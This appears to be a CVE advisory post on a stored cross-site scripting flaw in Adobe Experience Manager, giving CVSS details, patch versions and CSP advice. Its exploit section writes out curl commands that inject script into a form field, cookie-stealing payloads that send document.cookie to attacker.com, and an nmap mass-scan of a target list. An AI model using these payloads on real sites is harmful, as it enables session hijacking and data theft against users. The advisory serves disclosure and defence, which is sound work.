Listen to this Post
A stored Cross-Site Scripting (XSS) vulnerability exists in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04 and earlier due to improper neutralization of user-supplied input during web page generation (CWE-79). The flaw allows a low‑privileged attacker (e.g., an authenticated user with author/contributor roles) to inject malicious JavaScript into vulnerable form fields, such as text inputs, rich‑text editors, or metadata properties. Unlike reflected XSS, this stored variant persists because the payload is saved on the server (e.g., in the JCR repository) and subsequently rendered in the HTML output of any page that includes the tainted field without proper output encoding. When a victim—potentially a higher‑privileged user like an administrator or a regular site visitor—browses to the affected page, the victim’s browser executes the attacker’s script in the security context of the vulnerable domain.
The attack path starts with the attacker identifying a form field in the AEM authoring interface or a public‑facing component (e.g., a comment section, a custom component’s text area, or a page property) where input is not correctly sanitized. The attacker inserts a JavaScript payload, for example: `` or a more sophisticated snippet that steals session cookies (document.cookie), exfiltrates page content, or performs actions on behalf of the user. After submission, the payload is stored in the AEM repository as part of the node’s property.
When any other user requests a page that includes the stored value, AEM’s server‑side rendering (e.g., via JSP, HTL, or Sightly) outputs the unencoded string directly into the DOM. The victim’s browser then parses the HTML and executes the script. This behaviour matches the CVSSv3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, where:
– AV:N – The attack is exploitable remotely over a network.
– AC:L – No special conditions are required; the attacker only needs to find an injectable field.
– PR:L – Low‑privileged (authenticated) attacker account is sufficient.
– UI:R – The victim must view the poisoned page.
– S:C – The attack changes the security scope; the script can access resources beyond the original vulnerable component.
– C:L / I:L – Limited confidentiality and integrity impact.
– A:N – No availability impact.
Because AEM often stores administrative data and serves content with elevated trust, successful exploitation can lead to session hijacking, CSRF bypass, privilege escalation, or unauthorised content modification. The vulnerability is classified as MEDIUM severity with a CVSS base score of 5.4.
DailyCVE Form:
Platform: Adobe Experience Manager
Version: ≤6.5.24, LTS SP1, 2026.04
Vulnerability: Stored Cross-Site Scripting
Severity: MEDIUM (5.4)
date: June 9, 2026
Prediction: June 9, 2026 (Patch)
What Undercode Say:
Identify vulnerable form fields (example using curl and jq)
curl -k -X GET "https://aem-host:4502/content/sites/test.html" \
-H "Authorization: Bearer $AEM_TOKEN" \
2>/dev/null | grep -E "input|textarea|field"
Inject a benign test payload
curl -k -X POST "https://aem-host:4502/bin/receive" \
-H "Authorization: Bearer $AEM_TOKEN" \
-d "fieldName=comment&value=<script>console.log('xss')</script>" \
-w "HTTP %{http_code}\n"
Verify stored payload (check node property)
curl -k -X GET "https://aem-host:4502/content/sites/test/jcr:content/par/comment.json" \
-H "Authorization: Bearer $AEM_TOKEN" \
-H "Accept: application/json" | jq '."comment"'
Exploit exfiltration snippet (steal session)
curl -k -X GET "https://aem-host:4502/content/sites/test.html?xss=<script>fetch('https://attacker.com/steal?c='%2Bdocument.cookie)</script>"
// JavaScript payload example (Cookie stealer) var img = new Image(); img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie);
Mass check for unpatched instances (Nmap NSE stub) nmap -p 4502 --script http-stored-xss.nse --script-args "uri=/content/sites,payload=<script>alert(1)</script>" -iL aem_targets.txt
How Exploit:
- Enumerate accessible AEM form fields (e.g., comments, tags, page properties).
- Inject a persistent JavaScript payload into a field that lacks output encoding.
- Trigger the stored XSS by browsing to the page containing the tainted field.
- The victim’s browser executes the malicious script, exfiltrating sensitive data.
Protection:
- Upgrade to AEM Cloud Service Release 2026.05, AEM 6.5 Service Pack 25, or AEM 6.5 LTS Service Pack 2.
- Apply output encoding and context‑aware escaping in all HTL/JSP templates.
- Deploy a Content Security Policy (CSP) that disallows inline scripts and restricts script sources.
- Use AEM’s built‑in XSS protection filters (
com.adobe.granite.xss) and sanitise input in custom components.
Impact:
- Unauthorised session hijacking of any user who views the compromised page.
- Phishing, data theft, and defacement of AEM‑managed web content.
- Bypass of CSRF protections, leading to state‑changing operations.
- Potential privilege escalation if an admin or privileged user is tricked into visiting the malicious page.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
